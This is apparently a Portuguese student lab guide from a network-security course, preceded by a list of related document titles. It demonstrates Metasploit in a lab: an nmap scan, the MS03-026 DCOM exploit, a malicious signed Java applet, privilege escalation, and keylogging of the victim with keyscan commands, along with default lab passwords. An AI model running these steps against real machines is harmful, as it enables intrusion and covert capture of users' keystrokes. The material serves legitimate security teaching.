Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.



Documentos relacionados
Metasploit Sabe o que é?

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

TRABALHO INTRUSÃO DE REDES

Online Help StruxureWare Data Center Expert

INSTALAÇÃO DE SOFTWARES ÚTEIS EM ENGENHARIA CARTOGRÁFICA

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz

Roteiro 3: Sistemas Linux arquivos e diretórios

Configuração do Linux Educacional 5 para melhor uso do MonitorINFO-V4

Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto

INSTALAÇÃO DO CHEF FOODS NET

Manual de Instalação do Servidor Orion Phoenix Versão Novembro/2010

SCPIWeb. SCPIWebDespRec Aplicação Web para Consulta de Despesas e Receitas ( Lei Complementar nº 131 de 27 Maio de 2009 )

NetEye Guia de Instalação

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Manual de Instalação do Agente Citsmart

SAIBA MAIS SOBRE O LINUX E DESCUBRA QUAL DISTRIBUIÇÃO É MELHOR PARA VOCÊ! CURSO

NTP. Instalação e Configuração. Centro de Atendimento a Incidentes de Segurança - CAIS. Novembro de 1998 NTP PAL0102 PAL RNP

Noções de. Microsoft SQL Server. Microsoft SQL Server

ROTEIRO: IMPLANTANDO O SISTEMA OPERACIONAL LINUX. Introdução: FERRAMENTAS. Abaixo segue relação de aplicativos utilizados para realizar este roteiro:

Acesso Remoto Placas de captura

EMULADOR 3270 VIA WEB BROWSER

MANUAL DE INSTALAÇÃO 1) ORACLE VIRTUALBOX ; 2) MICROSOFT WINDOWS ; 3) SUMÁRIOS GENEPLUS.

IBM SPSS Modeler - Princípios Básicos do R: Instruções de Instalação

Parceiro Oficial de Soluções Zabbix no Brasil

Roteiro de instalação do jogo da Pirâmide Alimentar

Manual. Configuração D-Link. Módulo - Configuração. Renato Lopes da Silva Técnico em Prospecção MEC/SEED/DITEC/CETE

Compartilhando arquivos com o samba

TUTORIAL VMWARE WORKSTATION 8. Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial

HOW TO Procedimento para instalar Aker Firewall virtualizado no ESXi 5.0

SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS

O que é conexão de área de trabalho remoto?

Para a prova de conceito utilizamos o kit de ferramentas do Backtrack 5 r3 (SET + ETTERCAP). Demostraremos a seguir o processo utilizado.

1 REQUISITOS BÁSICOS PARA INSTALAR O SMS PC REMOTO

HOW TO. Instalação do Firewall 6.1 Software

Ferramentas de Acesso Remoto

Mensagens De Erro. Versão: 1.0

Instalando um pacote LAMP (Linux, Apache, MySQL, PHP) no Mandriva

Leia-me do Licenciamento em Rede

Para funcionamento do Netz, alguns programas devem ser instalados e alguns procedimentos devem ser seguidos. São eles:


Guia de instalação Command WorkStation 5.5 com o Fiery Extended Applications 4.1

Algumas das características listada nela:

CAPA Área de utilização para ilustração MANUAL w-vpn

AVG Admin 2012 SQL Server 2005 Express

Laboratório de Redes. Professora Marcela Santos

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Controle de congestionamento em TCP

1) Verifique se o Microsoft.Net Framework 3.5 está instalado, para isto, abrir o Painel de Controle e verificar:

Manual de Instalação ( Client / Server ) Versão 1.0

ATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta.

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t

INSTALANDO SOFTWARE Ifox irestaurantes

Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web

Instalação do utilitário de migração DBF SQL

Instruções para Instalação dos Utilitários Intel

Print Audit 6 - Instalação do SQL Server 2008 express R2

Instalação do Linux Educacional 3.0 Bancadas SED

1) Verifique se o Microsoft.Net Framework 3.5 está instalado, para isto, abrir o Painel de Controle e verificar:

FileMaker Pro 13. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13

Print Audit 6 - SQL Server 2005 Express Edition Installation Guide

Capítulo 8 Anti-Virus

Unidade Curricular Segurança em Redes. Diego Dummer Vaz. THC-Hydra

Cia de Tecidos Cedro Cachoeira, Pedido de Compra pela

Faculdade SENAC Pelotas Curso Superior de Tecnologia em Redes de Computadores Sistemas de Informação Professor Eduardo Maroñas Monks MEDIA CORE

Guia de usuário do portal de acesso SSH

Rotina de Discovery e Inventário

ESET Remote Administrator ESET EndPoint Solutions ESET Remote Adminstrator Workgroup Script de Logon

ÍNDICE 1.CONHECENDO OS APLICATIVOS NECESSÁRIOS PARA O FUNCIONAMENTO DO SISTEMA URANO INTEGRA...

Megamídia ML Sistemas - VALID MANUAL DE ATUALIZAÇÃO CFC DIGITAL VERSÃO 10

Unidade Curricular Redes I Prof. Eduardo Maroñas Monks Roteiro de Laboratório Ethernet/Auto-negociação/Largura de Banda

CONFIGURAÇÃO MINIMA EXIGIDA:

Introdução a Informática - 1º semestre AULA 02 Prof. André Moraes

Manual de Instalação e Configuração do SQL Express

Nessus Vulnerability Scanner

Satélite. Manual de instalação e configuração. CENPECT Informática cenpect@cenpect.com.br

Manual comandos Básicos para instalar e desinstalar Firebird em Sistema operacional Linux

Índice. Manual Backup Online. 03 Capítulo 1: Visão Geral

INSTALANDO SISTEMA PFSENSE COMO FIREWALL/PROXY

FTIN Formação Técnica em Informática Módulo Sistema Proprietário Windows AULA 02. Prof. André Lucio

VMware vcenter Converter TM

Manual de Instalação Digital Signage

Autoridade Certificadora Notarial CONFIGURAÇÃO DA MÁQUINA DA AR COM WINDOWS VISTA E WINDOWS 7 AC NOTARIAL. Página 1 de 14

3UHSDUDQGRR64/([SUHVVSDUDWUDEDOKDUFRP&ODULRQ

IBM SPSS Modeler - Princípios Básicos do R: Instruções de Instalação

Procedimentos para Configuração de Redirecionamento de Portas

Manual de Configuração do Alferes 7

MANUAL DE INSTALAÇÃO CONFIGURAÇÃO IDE ECLIPSE

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH!

Instalando o Lazarus e outros sistemas de suporte. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011

Introdução ao Sistema. Características

IMPORTANTE: O PNM4R2 não entra em estado funcional enquanto o Windows não

Manual de Instalação. Instalação via apt-get

Prática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr.

Guia para o Google Cloud Print

Transcrição:

Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação da ferramenta Metasploit. Ferramentas Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit. Introdução Neste roteiro de laboratório, será feita uma introdução a ferramenta de segurança em redes Metasploit, onde tem por objeito a criação de exploits. Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits. Escrito em Perl, possui componentes em C e Assembler, pode-se utilizar em Linux, BSD Windows, MacOS. Escrito na maioria das vezes em "Perl" (seu único defeito, de acordo com o parecer do número cada vez maior de amantes de "Python"...) e com vários componentes desenvolvidos em "C " e "Assembler", sua portabilidade está assegurada, o que contribui em larga medida para a sua aceitação maciça, porque qualquer que seja a sua escolha de plataforma de uso (Like-Unix, BSD, Mac X, Windows etc), pode instalá-lo e desfrutar todos os seus poderes em poucos minutos e sem grandes dificuldades. Tem a sua licença baseada tanto no GPL v2 e "Perl Artistic License", permitindo a sua utilização em projetos Open Source assim como em projetos comerciais, tendo como seu principal objetivo a criação de exploits e a montagem de um cenário de pesquisa, desenvolvimento e exploração de vulnerabilidades. Pois fornece as ferramentas que se fazem necessárias para descoberta da vulnerabilidade, análise, e desenvolvimento do exploit. Tarefas: 1) Habilitar a máquina virtual do Backtrack, Windows Server 2003 e Windows 7(Solicitar vms Windows ao colega). 1. Utilizar a máquina virtual do Backtrack 5, disponível em ftp://192.168.200.3/bt5r1- GNOME-VM-32.7z com rede em modo bridge. 2. Ao iniciar a máquina virtual acessar com o usuário root e senha toor. 2.1 Para iniciar o modo gráfico executar o comando "startx".

2.2 Habilitar o serviço de ssh no Backtrack com o comando sshdgenerate no terminal e após iniciar o serviço /etc/init.d/ssh start. 3. Caso prefira pode utilizar a máquina virtual ftp://192.168.200.3/tiaomacale3.zip 3.1 Fazer download do arquivo de instalação em http://www.metasploit.com/framework/download/ 3.2 Executar os comandos: # chmod +x metasploit-latest-linux-installer.run #./metasploit-latest-linux-installer.run 4. Iniciar a máquina virtual windows Server 2003, com a senha "senac2010" 2) Utilização do software Metasploit no Backtrack. 2.1 Acesse a ferramenta pelo terminal no caminho: /pentest/exploits/framework/ e execute./msfconsole para iniciar a ferramenta. 3) Vulnerabilidade Server 2003 (Sem service pack) 3.1 Caso não saiba o IP pode procurar pela porta 135 com o comando nmap -ss -p 135 XXX.XXX.XXX.*, caso saiba o IP do alvo execute nmap -SS -p 135 192.168.201.74. Observe a saída do comando e procure pela porta e seu estado, conforme a Figura 1. Figura 1: Varredura de portas. 3.2 Como a consulta retornou que a porta está ativa e no estado open, o próximo passo é utilizar o exploit windows/dcerpc/ms03_026_dcom. Portanto digite o seguinte comandos msf> use windows/dcerpc/ms03_026_dcom para utilizar o exploit e o Comando para listar portas e sistemas suscetíveis a este tipo de ataque msf exploit(ms03_026_dcom) > show options. 3.3 Com o IP do alvo descoberto basta setar ele e exploitar, com o comando msf exploit(ms03_026_dcom) > set rhost XXX.XXX.XXX.XXX e msf exploit(ms03_026_dcom) > exploit. Caso a máquina esteja em um estado vulnerável a sessão será aberta com o alvo igual à Figura 2.

Figura 2: Acesso a console da vítima. 3.4 Com o acesso ao console pode-se obter os comandos disponíveis com?, por exemplo ao digitar o comando sysinfo obtém se informações sobre o sistema atacado, Figura3. Figura 3: Execução de comando na máquina remota. 4) Engenharia social 4.1 Neste exercício o usuário terá que executar um aplicativo na sua máquina(windows 7), a partir desse ponto o atacante tem controle a máquina da vítima. Obs. Necessário o uso do Java. http://192.168.200.3/software/jre-6u13-windows-i 586-p-s.exe 4.2 Acesse a console do Metasploit como no passo 2.2.1, procure pelo java applet com o comando search java_signed_applet. Encontrado o exploit execute use multi/browser/java_signed_applet e liste as opções disponíveis com o comando msf exploit(java_signed_applet)> show options. 4.3 O próximo passo é criar uma aplicação com o comando msf exploit(java_signed_applet) > set APPLETNAME Mel, modificar a porta de escuta do servidor com o comando msf exploit(java_signed_applet)> set SRVPORT 80 e definir a URL com o comando msf exploit(java_signed_applet)> set URIPATH /mel, anunciar o servidor msf exploit(java_signed_applet) > set lhost XXX.XXX.XXX.XXX e para deixar o servidor em estado de listening execute o comando msf exploit(java_signed_applet) >

exploit SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL 4.4 Agora o usuário deverá digitar na máquina alvo o acesso ao site XXX.XXX.XXX/mel surgirá uma tela solicitando que o usuário execute o java. 4.5 Execute no terminal do Metasploit o comando sessions -l para listar as sessões ativas e o comando sessions -i 1 para assumir a sessão 1. Obs. Dependendo do usuário que acessou o site com o exploit você não terá permissões na máquina alvo, deverá ser feito um processo chamado uma escalada de processos, que consiste em executar o comando getsystem para que assuma o uid do usuário administrador da máquina, verifique com getuid o usuário que está acessando, Figura 4. Figura 4: Usuário atual. 4.6 Agora que tem poderes :) assuma o controle do explorer.exe com o comando migrate pid, onde pid é o número do processo do explorer.exe. Após isso digite o comando keyscan_start para começar a utilizar o keylogger, por fim execute keyscan_dump e será mostrado o que o usuário digitou na máquina invadida conforma a Figura 5. Figura 5: Exemplo de uso de keylogger.

Conclusões SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL Nota-se que há grandes vulnerabilidades espalhadas e com poucos comandos podem ser facilmente utilizadas para ações maliciosas. Observou-se que para os testes acima, atualizações de segurança e conscientização do usuário podem ajudar a se prevenir contra esse tipo de ataque. Referencias: Material no servidor Mussum Top Network Security Tools http://sectools.org/ Metasploit http://www.metasploit.com Distribuic ao BackTrack 3 (LiveCD) disponivel em ftp://192.168.200.3/bt3-final.iso Distribuic ao BackTrack 5 (VM) disponivel em ftp://192.168.200.3/bt5r1-gnome-vm- 32.7z